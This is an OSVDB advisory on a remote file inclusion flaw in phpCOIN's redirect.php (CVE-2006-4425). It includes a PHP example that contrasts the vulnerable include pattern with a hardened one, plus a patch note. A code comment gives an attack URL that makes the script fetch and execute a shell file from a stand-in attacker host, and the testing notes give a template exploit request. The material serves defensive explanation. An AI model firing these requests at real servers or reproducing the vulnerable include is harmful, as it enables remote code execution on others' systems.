phpCOIN redirect.php _CCFG[_PKG_PATH_INCL] Variable Remote File Inclusion

2006-08-24T04:34:21
ID OSVDB:28224
Type osvdb
Reporter Timq(timq@hackernetwork.com)
Modified 2006-08-24T04:34:21

Description

Vulnerability Description

phpCOIN contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to redirect.php not properly sanitizing user input supplied to the '_CCFG[_PKG_PATH_INCL]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. With it enabled, the request parameter _CCFG[_PKG_PATH_INCL] is registered as the global array element $_CCFG['_PKG_PATH_INCL'] before redirect.php executes, so an attacker-supplied value reaches the include() statement that builds the path from it. register_globals has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Inclusion of a file from a remote host additionally requires that PHP is allowed to open URLs from include() (allow_url_fopen on PHP releases before 5.2, allow_url_include on 5.2 and later); where that is disabled, the parameter still controls a local include path.
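The following PHP fragment is an added illustration, not phpCOIN's own code: it shows the include pattern this advisory describes (a configuration array populated from the request under register_globals and then used to build an include path) next to a hardened replacement. The file name core.php, the helper safe_include_path() and the second array key are assumptions; only the _CCFG[_PKG_PATH_INCL] name comes from the advisory.

```php
<?php
// Added example (not phpCOIN code). File names and helper names are assumptions.

// ---- vulnerable pattern ----
// With register_globals=On, the request
//   redirect.php?_CCFG[_PKG_PATH_INCL]=http://attacker.example/shell.txt?
// creates $_CCFG['_PKG_PATH_INCL'] before any line of this script runs.
// If the script never assigns that key itself (it only adds other keys, or
// expects a config file to have set it), the request value survives to include().
$_CCFG['_SOME_OTHER_KEY'] = 'value';           // script touches the array ...
include $_CCFG['_PKG_PATH_INCL'] . 'core.php'; // ... but this path came from the request.
// The trailing '?' in the attacker value turns the appended 'core.php' into a
// query string, so PHP fetches http://attacker.example/shell.txt?core.php and
// executes whatever it returns (requires allow_url_fopen / allow_url_include).

// ---- hardened pattern ----
// 1. Never let request data define configuration: reset the array and derive
//    the include directory from the script's own location, whatever php.ini says.
$_CCFG = array();
$_CCFG['_PKG_PATH_INCL'] = dirname(__FILE__) . '/';

// 2. Even for values that come from a trusted config file, accept only a plain
//    file name and confirm the resolved path stays inside the intended directory.
function safe_include_path($base, $name)
{
    if (!preg_match('/^[A-Za-z0-9_.-]+\.php$/', $name)) {
        return false; // no wrappers (http://, php://), no slashes, no traversal
    }
    $root = realpath($base);
    $real = realpath($base . $name);
    if ($root === false || $real === false) {
        return false; // directory or file does not exist
    }
    if (strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false; // resolved outside the intended directory
    }
    return $real;
}

$target = safe_include_path($_CCFG['_PKG_PATH_INCL'], 'core.php');
if ($target === false) {
    die('refusing to include an untrusted path');
}
include $target;

// 3. Defence in depth in php.ini: register_globals=Off, allow_url_include=Off
//    (PHP 5.2+), and allow_url_fopen=Off where the application does not need it.
```

The whitelist in safe_include_path() rejects the remote-URL and traversal forms outright; the realpath() comparison catches symlinks and path tricks that a pattern alone would miss. Resetting $_CCFG at the top is what actually closes the register_globals hole, since the later checks only matter if the path can still be influenced.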

Solution Description

Currently, there is no fixed upgrade release that corrects this issue. However, the vendor has released a patch to address this vulnerability (see the Vendor Specific Solution URL under References). Because, per the technical description above, the flaw only exists with register_globals set to 'on', running PHP with register_globals set to 'off' (the default since 4.2.0) prevents the request parameter from reaching the vulnerable script.

Short Description

phpCOIN contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to redirect.php not properly sanitizing user input supplied to the '_CCFG[_PKG_PATH_INCL]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/coin_includes/redirect.php?_CCFG[_PKG_PATH_INCL]=[file]

References:

Vendor URL: http://www.phpcoin.com/
Vendor Specific Solution URL: http://forums.phpcoin.com//index.php?showtopic=3&st=0&#entry3
Secunia Advisory ID: 21624
Related OSVDB ID: 28218
Related OSVDB ID: 28219
Related OSVDB ID: 28220
Related OSVDB ID: 28221
Related OSVDB ID: 28222
Related OSVDB ID: 28223
Related OSVDB ID: 28225
Nessus Plugin ID: 22267
ISS X-Force ID: 28572
Generic Exploit URL: http://milw0rm.com/exploits/2254
FrSIRT Advisory: ADV-2006-3385
CVE: CVE-2006-4425
Bugtraq ID: 19706